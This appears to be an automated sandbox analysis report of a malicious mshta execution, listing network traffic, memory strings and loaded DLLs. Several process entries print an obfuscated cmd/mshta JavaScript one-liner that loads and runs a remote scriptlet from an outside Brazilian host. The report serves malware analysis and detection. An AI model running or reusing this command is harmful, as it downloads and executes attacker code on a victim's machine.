Source: global traffic |
HTTP traffic detected: GET /?2/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cronal184.phroativa.com.brConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.wikipedia.org |
Source: global traffic |
HTTP traffic detected: GET /?2/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cronal184.phroativa.com.brConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.wikipedia.org |
Source: mshta.exe, 00000003.00000003.1233596963.00000290661AD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: HTtps://cronal184.phroativa.com.br/?2/ |
Source: mshta.exe, 00000003.00000002.1236137885.0000028863F3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: HTtps://cronal184.phroativa.com.br/?2/( |
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://creativecommons.org/licenses/by-sa/4.0/ |
Source: mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236239083.0000028863F8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cronal184.phroativa.com.br/ |
Source: mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1233829051.00000290661DB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cronal184.phroativa.com.br/?2/ |
Source: mshta.exe, 00000003.00000002.1236630762.0000029066412000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cronal184.phroativa.com.br/?2/St |
Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cronal184.phroativa.com.br/?2/U |
Source: mshta.exe, 00000003.00000002.1236137885.0000028863F3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232784968.0000028863F3E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cronal184.phroativa.com.br/?2/l |
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://donate.wikimedia.org/?utm_medium=portal&utm_campaign=portalFooter&utm_source=portalFooter |
Source: mshta.exe, 00000003.00000002.1235891376.0000028863EE5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c |
Source: mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://intake-logging.wikimedia.org/v1/eventsx |
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://itunes.apple.com/app/apple-store/id324715238?pt=208305&c |
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://itunes.apple.com/app/apple-store/id324715238?pt=208305&ct=portal&mt=8 |
Source: mshta.exe, 00000003.00000003.1232948851.0000028863F93000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236254485.0000028863F94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232880364.0000028863F87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863F83000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com |
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://meta.wikimedia.org/wiki/Privacy_policy |
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://meta.wikimedia.org/wiki/Special:MyLanguage/List_of_Wikipedias |
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://meta.wikimedia.org/wiki/Terms_of_use |
Source: mshta.exe, 00000003.00000003.1232082384.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232173549.0000029066210000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231984723.0000029066201000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1231870463.0000029066201000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://play.google.com/store/apps/details?id=org.wikip |
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://play.google.com/store/apps/details?id=org.wikipedia&referrer=utm_source%3Dportal%26utm_mediu |
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://upload.wikimedia.org/wikipedia/en/thumb/8/80/Wikipedia-logo-v2.svg/2244px-Wikipedia-logo-v2. |
Source: mshta.exe, 00000003.00000003.1230434017.00000290661DE000.00000004.00000020.00020000.00000000.sdmp, EJF5C7CA.htm.3.dr |
String found in binary or memory: https://wikis.world/ |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mshta.exe MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()" |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: mshtml.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: powrprof.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wkscli.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: umpdc.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msiso.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: srpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msimtf.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dxgi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: resourcepolicyclient.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dataexchange.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: d3d11.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dcomp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: twinapi.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: jscript9.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: scrobj.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: schannel.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: mskeyprotect.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ncryptsslp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msls31.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: d2d1.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dwrite.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: d3d10warp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dxcore.dll |
Jump to behavior |
Source: mshta.exe, 00000003.00000003.1232948851.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232642532.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236254485.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1232880364.0000028863FAE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWi>pG |
Source: mshta.exe, 00000003.00000003.1232642532.0000028863F5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1236199318.0000028863F5E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWP} |
Source: unknown |
Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c mshta "javascript:var _$_nxui=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{getobject(_$_nxui[1])[_$_nxui[0]]()}catch(e){};close()" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mshta.exe mshta "javascript:var _$_nxui=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{getobject(_$_nxui[1])[_$_nxui[0]]()}catch(e){};close()" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mshta.exe mshta "javascript:var _$_nxui=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{getobject(_$_nxui[1])[_$_nxui[0]]()}catch(e){};close()" |
Jump to behavior |